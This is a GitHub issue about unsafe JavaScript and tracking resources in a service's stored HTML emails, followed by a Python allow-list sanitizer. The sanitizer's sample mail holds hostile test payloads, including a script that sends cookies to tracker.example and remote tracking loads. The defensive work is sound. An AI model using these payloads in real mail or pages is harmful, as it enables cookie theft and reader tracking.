Unsafe content in HTML emails #59

Describe the bug
JavaScript and external resources are allowed in the "HTML version" of the email, which might lead to tracking and IP address leakage, and a wide range of other security issues.
To Reproduce
Steps to reproduce the behavior:
Expected behavior
By default they should be blocked, OR at least the user should be given control.
Screenshots

Comments
Hi @dcRUSTy, you are right here. I never bothered to take this into account, as I thought the unique HTML link would only be available to the user, and there is no user-to-user mail sending, as one user would not even get the email ID of any other user, and this is done via brute force. Give me some time to see what the best way would be to fix/remediate this. I will keep this issue open till then.
Thinking out loud... In addition to the above, how about sending the HTML file as an attachment in the bot? This way the user has a copy of his email irrespective of whether the service works in future or not, and it also solves the overhead of storing the HTML file on the server.
But this won't fix the issue. JS file execution will still be there. Something else is needed.
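The thread ends with "something else is needed". One approach that matches the report's expected behaviour (blocked by default, with the user given control) is to rewrite the stored "HTML version" through an allow-list before it is saved or served. The following is an added example written for this page, not code from this project or its maintainer; it uses only the Python standard library's `html.parser`. Every name in it (`sanitize_email_html`, `EmailHtmlSanitizer`, the `allow_remote_images` switch) and the constructed sample mail with its `tracker.example` host are assumptions made for the example, not anything the project ships.

```python
import re
from html import escape
from html.parser import HTMLParser

# Removed together with their content: script execution, remote loads on render,
# or containers that can hold either. Void ones (DROP_VOID) just lose the tag.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "noscript",
                     "svg", "math", "template", "form", "textarea", "select", "button"}
DROP_VOID = {"link", "meta", "base", "input"}
# Allow-list of kept elements and the attributes kept on each; all else is stripped.
ALLOWED = {t: set() for t in ("p br hr div span b i u em strong small blockquote pre "
                              "code ul ol li h1 h2 h3 h4 h5 h6 table thead tbody tfoot tr").split()}
ALLOWED.update({"a": {"href", "title"}, "img": {"src", "alt", "width", "height"},
                "td": {"colspan", "rowspan"}, "th": {"colspan", "rowspan"}})
VOID = {"br", "hr", "img"}
_CONTROL = re.compile(r"[\x00-\x20\x7f]")
_SCHEME = re.compile(r"^([a-z][a-z0-9+.\-]*):", re.I)

def url_scheme(url):
    """Scheme as a browser sees it: control chars dropped first, so 'java\\tscript:' still matches."""
    match = _SCHEME.match(_CONTROL.sub("", url))
    return match.group(1).lower() if match else ""

def is_remote(url):
    """True if rendering this URL would contact a server and so reveal the reader's IP."""
    return url_scheme(url) in ("http", "https") or _CONTROL.sub("", url).startswith("//")

class EmailHtmlSanitizer(HTMLParser):
    """Unknown tags lose their markup but keep their text; dangerous ones lose content too."""

    def __init__(self, allow_remote_images=False):
        super().__init__(convert_charrefs=True)   # entities decoded, so &#106;avascript: is seen
        self.allow_remote_images = allow_remote_images
        self.out, self.blocked = [], []            # output chunks; log of what was removed
        self._skip = None                          # [tag, depth] while inside a dropped element

    def handle_starttag(self, tag, attrs):
        if self._skip:
            if tag == self._skip[0]:
                self._skip[1] += 1
            return
        if tag in DROP_WITH_CONTENT:
            self.blocked.append(f"<{tag}> removed with its content")
            self._skip = [tag, 1]                  # unclosed: rest of mail is dropped (fail closed)
            return
        if tag in DROP_VOID:
            self.blocked.append(f"<{tag}> removed")
            return
        kept = []
        for name, value in attrs:
            name, value = name.lower(), value or ""
            if name.startswith("on") or name == "style":   # event handlers; CSS url() loads
                self.blocked.append(f"{tag}[{name}] removed")
                continue
            if tag not in ALLOWED or name not in ALLOWED[tag]:
                continue
            if name == "href" and url_scheme(value) not in ("", "http", "https", "mailto"):
                self.blocked.append(f"a[href] {value!r} rejected (scheme)")
                continue
            if name == "src":
                if is_remote(value) and not self.allow_remote_images:
                    self.blocked.append(f"img[src] {value!r} blocked (remote fetch)")
                    continue
                if not is_remote(value) and not _CONTROL.sub("", value).lower().startswith("data:image/"):
                    self.blocked.append(f"img[src] {value!r} rejected (scheme)")
                    continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        if tag not in ALLOWED:
            return
        if tag == "a":   # following a link must not send the secret page URL as Referer
            kept.append(' rel="noopener noreferrer" target="_blank"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self._skip:
            if tag == self._skip[0]:
                self._skip[1] -= 1
                if self._skip[1] == 0:
                    self._skip = None
            return
        if tag in ALLOWED and tag not in VOID:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):    # comments and declarations are ignored by default
        if not self._skip:
            self.out.append(escape(data, quote=False))

def sanitize_email_html(html, allow_remote_images=False):
    """Return (clean_html, list_of_blocked_items)."""
    parser = EmailHtmlSanitizer(allow_remote_images)
    parser.feed(html)
    parser.close()
    return "".join(parser.out), parser.blocked

# Constructed sample mail using the tricks the issue describes (hypothetical hosts).
SAMPLE_MAIL = """<html><head><meta http-equiv="refresh" content="0;url=http://tracker.example/x">
<style>body{background:url(http://tracker.example/css)}</style></head>
<body onload="fetch('http://tracker.example/ip')">
<p>Hello &amp; welcome</p>
<img src="http://tracker.example/pixel.gif?id=42" width="1" height="1" alt="">
<img src="data:image/png;base64,iVBORw0KGgo=" alt="logo">
<a href="&#106;avascript:alert(1)">click</a>
<a href="https://example.com/reset">reset</a>
<script>location='http://tracker.example/?c='+document.cookie</script>
<!--[if IE]><script src="http://tracker.example/ie.js"></script><![endif]-->
</body></html>"""
```

`sanitize_email_html(SAMPLE_MAIL)` returns a copy with the tracking pixel, `onload`, `<meta refresh>`, `<style>`, `<script>` and the entity-encoded `javascript:` link all gone, plus a `blocked` list that can be shown to the user; passing `allow_remote_images=True` is the "user should be given control" switch, re-enabling remote images only. Two caveats a practitioner would want: the allow-list fails closed, so an unclosed `<iframe>` drops the rest of the mail rather than leaking it; and the `rel="noreferrer"` on links exists because the maintainer's threat model relies on the unique HTML link staying secret, which a plain link click would otherwise leak in the `Referer` header. When the file is served over HTTP, a `Content-Security-Policy: default-src 'none'; img-src data:` and `Referrer-Policy: no-referrer` header on the response is cheap defence in depth should a sanitiser bypass ever be found.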